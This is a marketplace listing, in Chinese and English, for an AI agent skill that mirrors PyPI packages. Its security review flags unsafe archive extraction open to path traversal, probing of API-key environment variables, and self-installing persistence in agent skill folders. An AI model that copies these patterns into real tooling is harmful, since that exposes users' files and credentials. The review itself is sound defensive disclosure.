← 返回 Skills 市场
amberlee2427

Obscure Package Master

作者 Amber Malpas · GitHub ↗ · v1.0.0 · MIT-0
cross-platform ⚠ suspicious
70
总下载
0
收藏
0
当前安装
1
版本数
在 OpenClaw 中安装
/install obscure-package-master
功能描述
Use this skill if your uncertainty with a package's API is > 5% to create a deterministic, versioned mirror of the package repo with a built-in coordinate sy...
安全使用建议
This tool appears coherent for creating local mirrors of Python packages, but take precautions before running it: - Review and sandbox: Inspect the generate_mirror.py source yourself (it's included). Prefer running it in an isolated environment (container, ephemeral VM, or a throwaway account) so its filesystem writes and network downloads can't affect important data. - Archive extraction risk: The script uses tarfile.extractall() and zipfile.extractall() without sanitizing paths—malicious or malformed archives could write files outside tmp_download. Don’t run it on untrusted packages without adding safe extraction checks. - Environment probing: The script checks many provider API key environment variables (OpenAI/Gemini/Anthropic/Copilot). It doesn't appear to send them anywhere, but it will observe them. If you’re uncomfortable, run with those env vars unset or in a restricted environment. - Network trust: The tool uses pip to download source distributions from PyPI. If you mirror packages you don’t control, ensure you trust the package/version (supply pinned versions you reviewed). Consider using an internal package proxy/mirror if you have one. - Check generated content: After running, inspect the newly created .skills/<package>-<version>/references and SKILL.md before allowing an agent to use them. Make sure no unexpected files were created and no existing skills were overwritten. If you want to use this skill, consider patching the script to implement safe archive extraction (sanitize file names), and to avoid scanning for provider API keys unless explicitly requested.
功能分析
Type: OpenClaw Skill Name: obscure-package-master Version: 1.0.0 The skill bundle contains a script, `scripts/generate_mirror.py`, that automatically generates and installs new skills into sensitive, provider-specific directories (e.g., `~/.claude/skills`, `~/.openai/skills`). It determines these paths by inspecting environment variables for sensitive API keys (e.g., `ANTHROPIC_API_KEY`, `OPENAI_API_KEY`, `GEMINI_API_KEY`). While the stated goal is to provide grounded API references via AST parsing, the automated installation of third-party code and instructions into the agent's trusted environment functions as a persistence mechanism and increases the risk of executing malicious code downloaded from PyPI. The `SKILL.md` file provides instructions that encourage the agent to perform this self-expansion whenever it encounters API uncertainty.
能力评估
Purpose & Capability
The name/description (creating a deterministic, versioned local mirror/grep-map of a Python package) matches the behavior of the included generate_mirror.py: it downloads a package, extracts source, parses AST, writes a .skills/<package>-<version> directory with references and SKILL.md. Requesting provider-specific paths via env detection is consistent with installing the generated skill into a provider's skills folder.
Instruction Scope
SKILL.md and the script instruct the agent to download packages from PyPI, extract archives, and write files into the agent's skills directory. The code also inspects environment variables (provider API keys and AGENT_SKILLS_PATH) not declared in the skill metadata. While provider detection is plausible, the script's behavior grants it filesystem write access to a skills directory and reads many environment variables beyond the metadata.
Install Mechanism
No install spec (instruction-only) but the package includes a runnable Python script that performs network downloads and archive extraction. The script calls `pip download` (expected) and then uses tarfile.extractall() and zipfile.extractall() without path-sanitization—this is a known path-traversal/unsafe-extraction vulnerability that can write files outside the intended tmp dir. The script writes generated skill directories into provider/agent skill paths, which is powerful and persistent on disk.
Credentials
The skill metadata lists no required env vars, but SKILL.md and the script probe many provider API key env vars (ANTHROPIC_API_KEY, CLAUDE_API_KEY, GEMINI_API_KEY, OPENAI_API_KEY, CODEX_API_KEY, GITHUB_COPILOT_TOKEN, AGENT_PROVIDER, AGENT_SKILLS_PATH). Reading those secrets to detect provider is not strictly necessary for mirroring a PyPI package and is disproportionate without explicit declaration; the script does not exfiltrate them but will observe them if present.
Persistence & Privilege
The script intentionally writes a new skill into the agent's skills directory (e.g., ~/.openai/skills or ./.skills). This is consistent with the stated goal (generate a local skill), but it means the skill will create persistent files in agent-managed locations and could overwrite or clutter the skills folder. 'always' is false and the skill does not auto-enable itself across agents, but filesystem persistence is present.
如何使用
  1. 确保已安装 OpenClaw(本地或 Docker 部署)
  2. 在对话框中输入安装命令:/install obscure-package-master
  3. 安装完成后,直接呼叫该 Skill 的名称或使用 /obscure-package-master 触发
  4. 根据 Skill 的参数说明提供必要输入,即可获得结构化输出
版本历史
v1.0.0
Initial release of obscure-package-master - Provides a method to create deterministic, versioned mirrors of obscure Python packages, with an AST-derived "grep map" of all classes and functions. - Enables users to efficiently locate and read precise code segments, reducing uncertainty about unfamiliar package APIs. - Integrates local skill generation and activation for package versions using a script. - Compatible with multiple AI agent providers, with configurable installation paths via environment variables or config files. - Designed to prevent API hallucinations by relying solely on source code structure, not LLM interpretations.
元数据
Slug obscure-package-master
版本 1.0.0
许可证 MIT-0
累计安装 0
当前安装数 0
历史版本数 1
常见问题

Obscure Package Master 是什么?

Use this skill if your uncertainty with a package's API is > 5% to create a deterministic, versioned mirror of the package repo with a built-in coordinate sy... 它是一个面向 Claude Code / OpenClaw 的 AI Agent Skill 插件,目前累计下载 70 次。

如何安装 Obscure Package Master?

在 OpenClaw 或 Claude Code 对话框中运行命令「/install obscure-package-master」即可一键安装,无需额外配置。

Obscure Package Master 是免费的吗?

是的,Obscure Package Master 完全免费,采用 MIT-0 许可证,可自由下载、安装和使用。

Obscure Package Master 支持哪些平台?

Obscure Package Master 跨平台运行,可在任意部署了 OpenClaw / Claude Code 的环境中使用(cross-platform)。

谁开发了 Obscure Package Master?

由 Amber Malpas(@amberlee2427)开发并维护,当前版本 v1.0.0。

推荐 Skills
self-improving agent
Captures learnings, errors, and corrections to enable continuous improvement. Use when: (1) A command or operation fails unexpectedly, (2) User corrects Clau...
⬇ 463283 · by pskoett
Skill Vetter
Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope, and suspicious patterns.
⬇ 259410 · by spclaudehome
Polymarket
Query Polymarket prediction markets. Check odds, find trending markets, search events, track price movements.
⬇ 232503 · by joelchance
Self-Improving + Proactive Agent
Self-reflection + Self-criticism + Self-learning + Self-organizing memory. Agent evaluates its own work, catches mistakes, and improves permanently. Use when...
⬇ 200423 · by ivangdavila
Github
Interact with GitHub using the `gh` CLI. Use `gh issue`, `gh pr`, `gh run`, and `gh api` for issues, PRs, CI runs, and advanced queries.
⬇ 191115 · by steipete
ontology
Typed knowledge graph for structured agent memory and composable skills. Use when creating/querying entities (Person, Project, Task, Event, Document), linkin...
⬇ 190156 · by oswalpalash

💬 留言讨论